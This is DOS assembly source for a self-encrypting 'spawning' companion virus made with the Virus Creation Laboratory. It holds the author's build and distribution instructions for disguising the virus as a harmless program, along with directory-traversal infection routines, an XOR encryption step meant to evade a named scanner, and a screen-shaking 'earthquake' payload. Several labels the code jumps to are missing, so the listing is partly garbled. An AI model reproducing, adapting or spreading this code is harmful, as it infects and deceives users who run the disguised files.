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; -----------------------------------------------------------------------------
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Heavily modified VCL and Original Code by the best Bleeding Edge virus
; writer: Night Breeze. See you all in fuckin' HELL!
; This is a "spawning" virus and, technically, a trojan horse. First time it
; is run, it will do the earthquake thing - but only after infecting another
; file first! When the infected file is executed (in it's directory) then it
; will infect another file and run the app. Then, when all files on that drive
; are infected, it will again do the earthquake thing!
; Build instructions:
; d:\tasm\tasm /mx /m2 /q /t quake
; link quake;
; exe2bin quake.exe quake.com
; Run QUAKE.COM and file the infected file...<g>
; Find file
; ATTRIB *.COM -r -h
; Get a copy of that file as it is encrypted...
; COPY filename.COM \mydir\TEMP.COM
; Cat the two files:
; COPY /b TEMP.COM+QINJECT.EXE QUAKE.EXE (i know, overwrites)
; Now, QINJECT actually as the same strings (most) as QUAKE.COM, so if the
; user types or debugs the program, will see the strings. The REAL virus
; is hidden, and encrypted, at the start of QUAKE.EXE (it's really a com file).
; NOTE: The flag SHOW_FLAG is used to allow an intial infection, then to all
; the victim to see an apparently good program - although he is getting
; fucked :)
; If all that was too hard... just distribute the enclosed EARTH.EXE program:)
; -----------------------------------------------------------------------------
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
; -----------------------------------------------------------------------------
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
inc Show_Flag ; Inc infect count
mov si, offset spawn_name ; Save a copy of the
mov di, offset save_name ; file to "spawn"
mov cx, 14 ; It's allways 14 bytes
rep movsb
call search_files ; Find and infect a file
mov al,byte ptr [set_carry] ; AX holds ALL INFECTED value
cmp al, 0 ; Have we infected all files?
jz Effect ; If so, then do it!
cmp Show_Flag,3 ; Should we show display?
jl Effect
jmp short end00
call EarthQuake ; Let's do it!
jmp short Finito ; And don't run app!
mov ah,04Ah ; DOS resize memory function
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
int 021h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset save_name ; SI points to true filename
int 02Eh ; DOS execution back-door
mov ah,04Ch ; DOS terminate function
int 021h
main endp
; -----------------------------------------------------------------------------
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
; -----------------------------------------------------------------------------
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
; -----------------------------------------------------------------------------
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx, 00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
; -----------------------------------------------------------------------------
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx, 00100011b ; CX holds file attributes
int 021h
xchg bx,ax ; BX holds file handle
call encrypt_code ; Write an encrypted copy
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
; -----------------------------------------------------------------------------
spawn_name db 0, 12 dup (?),13 ; Name for next spawn
save_name db 0, 12 dup (?),13 ; Name for current spawn
show_flag db 0 ; When 0 & 1 then show display
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
; =============================================================================
EarthQuake proc near
call InitCrt ; Initialize the vars
call DrawFrame ; Draw a frame in middle of screen
mov cx, 2 ; Make some noise
call Siren
mov si, OFFSET Warning ; Put Msg 1
mov dx,0718h ; Move to Row 8, column 20
call WriteStr
mov cx, 1
call Siren
mov si, OFFSET ToHills ; Put Msg 2
mov dx,0A16h ; Move to Row 10, column 18
call WriteStr
mov cx, 2 ; More noise
call Siren
call Shake ; Shake the screen - it's a quake!
call DrawFrame ; Draw a frame in middle of screen
mov si, OFFSET MadeIt ; Put Made It Msg
mov dx,081Fh
call WriteStr
cmp Show_Flag, 3
jl EarthDone
mov si, OFFSET BurmaShave ; Put Logo
mov dx,0C36h
call WriteStr
EarthQuake endp
Warning db '* * * Earthquake Warning! * * *', 0
ToHills db 'Head for the hills! Take cover!!!', 0
MadeIt db 'Whew! We Made It!', 0
BurmaShave db '-=[VCL/BEv]=-', 0
Table struc ; Structure of the Shaker Table
Iters db 0 ; Number of interations (quakes)
Cols db 0 ; Scroll number of columns
Pause dw 0 ; And then wait this much time
Table ends
QuakeTable Table < 3, 1, 500>
Table < 4, 2, 250>
Table < 5, 3, 175>
Table < 6, 4, 100>
Table <10, 5, 30>
Table <20, 5, 10>
Table <10, 5, 30>
Table < 5, 4, 100>
Table < 4, 3, 175>
Table < 3, 2, 250>
Table < 2, 1, 500>
Table < 0, 0, 0> ; End of data
; -----------------------------------------------------------------------------
Shake proc near
mov si, OFFSET QuakeTable ; Get pointer to table
xor cx,cx
mov cl, [si].Iters
jcxz ShakeDone
push cx ; Save for later
push si ; ditto
xor ax,ax ; duh...
mov al, [si].Cols ; Number of columns to scroll
push ax ; Get Ready
call ScrollRight ; Go...Scroll Screen to right
pop si ; Restore it
cmp [si].Cols, 3 ; Check if we are scrolling more than 3
jle ShakeCont1 ; If less or equal then skip vert scroll
mov ah, 6 ; Scroll up 1 line
call Scroll ; Do it.
mov cx, [si].Pause ; delay period
call Delay ; Wait around a bit
push si ; And save our table index for l8r
xor ax,ax ; duh...
mov al, [si].Cols ; Number of columns to scroll
push ax ; Get Ready...Set...
call ScrollLeft ; Go! ... Scroll screen left
pop si ; And restore our table index
cmp [si].Cols, 3 ; Check if we are scrolling more than 3
jle ShakeCont2 ; If less or equal then skip vert scroll
mov ah, 7 ; Scroll up 1 line
call Scroll ; Do it.
mov cx, [si].Pause ; pause again
call Delay ; Do it.
pop cx ; Get back our iteration counter
Loop ShakeInner ; Keep going
add si, 4 ; Move to next table element
jmp short ShakeNext ; Keep on doing it...
Shake endp
; -----------------------------------------------------------------------------
; in: cx = number of times to do the siren
Siren proc near
push cx ; Save the count
mov ax, 880 ; Freq
mov bx, 500 ; Duration = 1/2 second
push ax ; Put Freq on stack
push bx ; Put Duration on stack
call Beep ; Make a noise
mov ax, 660 ; Freq
mov bx, 500 ; Duration = 1/5 second
push ax ; Put Freq on stack
push bx ; Put Duration on stack
call Beep ; Make more noise
pop cx ; Restore the count
loop KeepGoing ; So we can keep going
Siren endp
; -----------------------------------------------------------------------------
; ds:si points to the null terminated string to print
; dx has row/col - dh=row
WriteStr proc near
mov bh,0 ; We'll be working on page 0
mov al,[si] ; get the next character to print
cmp al, 0 ; done yet?
jz WriteDone ; Yep, so quit
inc si ; si++
mov ah,2 ; locate cursor at dx
int 10h ; do it
push cx ; save it for later
mov cx,1 ; count of characters to write!
mov ah,10 ; subfunction 10
int 10h ; call bios to do our dirty work
pop cx ; get it back
inc dx ; move to next cursor position
jmp short WriteMore ; keep going for cx
WriteStr endp
; -----------------------------------------------------------------------------
DrawFrame proc near
push bp ; Work around a stoopid bug in PC/XTs
mov ax, 0600h ; Draw and clear the outer frame
push ax ; Save for later
mov cx, 050Ah ; Upper screen coords: CH = ROW
mov dx, 0D46h ; Lower bounds, DH = ROW
mov bh, 70h ; Color is White Background, Black fore
int 10h ; Do It.
pop ax ; Draw and clear the inner frame
mov cx, 060Ch ; Upper screen coords: CH = ROW
mov dx, 0C44h ; Lower bounds, DH = ROW
mov bh, 0Eh ; Color is Black Background, Yellow fore
int 10h ; Do It Again
pop bp ; End of stoopid fix
DrawFrame endp
; =============================================================================
ScrollRight proc near
push bp
mov bp, sp
mov ax, [bp+4] ; calc ColsToMove <- LEN shl 1
shl ax, 1 ; multiply by 2
mov ColsToMove, ax ; And save it
mov bx, NumCols ; calc WordsToScroll <- NumCols - LEN
sub bx, ax ; adjust for scroll difference
inc bx ; BX = WordsToScroll
mov ax, VidSegment ; Put ES = Video Segment
mov es, ax
xor ax, ax ; Start on row 0 aka 1
push ax ; Save for later
mul LineWidth ; AX now has ROW * LineWidth
push ax ; Save start of row offset for printing
add ax, LineWidth ; AX points to last byte of the row
sub ax, ColsToMove ; This moves back 1 LEN of ch/attr pairs
mov di, ax ; save in DEST
sub ax, ColsToMove ; AX now moves back another LEN pairs
mov si, ax ; save in SOURCE
mov cx, bx ; BX = Words to Scroll
push ds ; Stash this
push es ; Make DS = ES
pop ds ; Like this
std ; Set SI and DI to decrement
rep movsw
pop ds ; Get the DS back
pop di ; Grab the Source Offset we saved above
mov cx, [bp+4] ; Prepare to print LEN blanks
call PrintBlank
pop ax ; Saved row
inc ax ; Move to next row
cmp ax, 25 ; Done with all rows?
jne sr_NextRow ; No? Then do next row!
mov sp, bp
pop bp
ret 2
ScrollRight endp
; -----------------------------------------------------------------------------
ScrollLeft proc near
push bp
mov bp, sp
mov ax, [bp+4] ; calc ColsToMove := Len Shl 1
shl ax, 1
mov ColsToMove, ax
mov bx, NumCols ; calc WordsToScroll := pred(NumCols) shl 1
mov ax, VidSegment ; Make ES point to the video segment
mov es, ax
mov es, ax
xor ax, ax ; Start on row 0 aka 1
push ax ; Save Row for later
mul LineWidth ; calc AX := Row * LineWidth
push ax ; Save Start of Line
mov di, ax ; This is where it's going
add ax, ColsToMove ; calc AX := AX + ColsToMove
mov si, ax ; This will be our source
push ds ; Stash for later ...
push es ; Make DS = ES = Video Segment
pop ds
mov cx, bx ; BX = Words To Scroll
cld ; Set SI and DI to decrement
rep movsw
pop ds ; Get our DS back...
pop di ; Grab the Source Offset we saved
add di, LineWidth
sub di, colsToMove
mov cx, [bp+4] ; Prepare to print some blanks
call PrintBlank ; Do It
pop ax ; Get back out row value
inc ax ; And move to next row
cmp ax, 25 ; first check if we are done
jne sl_NextRow ; If now, then do next row
mov sp, bp
pop bp
ret 2
ScrollLeft endp
; -----------------------------------------------------------------------------
; In AH = 6 scroll up
; = 7 scroll down
Scroll proc near
mov al, 1 ; We will always scroll 1 line
xor cx, cx ; Set Top Row/Col to (0,0)
mov dx, 184Fh ; Set Bottom Row/Col to (24,79)
mov bh, 07h ; Use a normal blank
push bp ; Work around a lame bug on PC/XTs
int 10h ; Do Bios...Oh Do Me Now
pop bp ; And continue fixing that st00pid bug
ret ; I really feel sill doc'g this routine...
Scroll endp
; -----------------------------------------------------------------------------
PrintBlank proc near
; In ES - Video Segment
; DI - Offset to print blank at
; CX - Number of blanks to print
cld ; store forward (increment DI)
mov al,' ' ; We want to print a blank
stosb ; put in one blank char
inc di ; skip video attribute
loop short PrintAgain
PrintBlank endp
; -----------------------------------------------------------------------------
; All the routines dealing with Sound and Delays - especially the delay
; calibration routine were mostly stolen from Kim Kokkonen's code in earlier
; version of Turbo Professional. KK is the owner of Turbo Power - a damn good
; set of programming tools - plug plug!
; Beep(Hz, MS:Word); assembler;
Beep proc near
push bp
mov bp, sp
mov bx, [bp+6] ; hertz
mov AX,34DDH
mov DX,0012H
cmp DX,BX
jnc beepStop
div BX
mov BX,AX ; Lots of port tweaking... Isn't
in AL,61H ; this shit fun???
test AL,3
jnz @99
or AL,3
out 61H,AL
mov AL,0B6H
out 43H,AL
mov AL,BL ; I know I never get bored.!!
out 42H,AL
mov AL,BH
out 42H,AL
mov CX, [bp+4] ; push ms delay time
call Delay ; and wait...
IN AL, 61h ; Now turn off the speaker
out 061h, AL
mov sp, bp
pop bp
ret 4
Beep endp
; -----------------------------------------------------------------------------
; In: cx = delay in ms
Delay proc near
delay1: ; What's to say... a tight loop
call delayOneMS ; counting milliseconds
loop short delay1
Delay endp
; =============================================================================
DelayOneMS proc near
push cx ; Save CX
mov cx, OneMS ; Loop count into CX
loop delayOne1 ; Wait one millisecond
pop cx ; Restore CX
DelayOneMs endp
; -----------------------------------------------------------------------------
Calibrate_Delay proc near
mov ax,40h
mov es,ax
mov di,6Ch ; ES:DI is the low word of BIOS timer count
mov OneMS, 55 ; Initial value for One MS's time
xor dx,dx ; DX = 0
mov ax,es:[di] ; AX = low word of timer
cmp ax,es:[di] ; Keep looking at low word of timer
je CalKeepOn ; until its value changes...
mov ax,es:[di] ; ...then save it
call DelayOneMs ; Delay for a count of OneMS (55)
inc dx ; Increment loop counter
cmp ax,es:[di] ; Keep looping until the low word...
je CalDoMore ; ...of the timer count changes again
mov OneMS, dx ; DX has new OneMS }
Calibrate_Delay endp
; -----------------------------------------------------------------------------
InitCrt proc near
mov ah,15 ; Get Video Mode
int 10h
cmp al, 7 ; Check if this is monochrome
je DoneInit
add VidSegment, 800h
mov byte ptr NumCols, ah ; Set the number of Character Cols
shl ah, 1 ; Mult by two for number of vid bytes
mov byte ptr LineWidth, ah ; And stash it...
call Calibrate_Delay
InitCrt endp
; =============================================================================
VidSegment dw 0B000h ; Base Video Segment
NumCols dw ? ; Columns on Screen
LineWidth dw ? ; NumCols * 2
ColsToMove dw ? ; Number of video bytes to move each time
OneMS dw ? ; Calibration value for 1 ms of time
; =============================================================================
encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si],1 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus
call finish ; Encrypt/write/decrypt
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
; -----------------------------------------------------------------------------
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
nop ; Defeat SCAN 95B
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main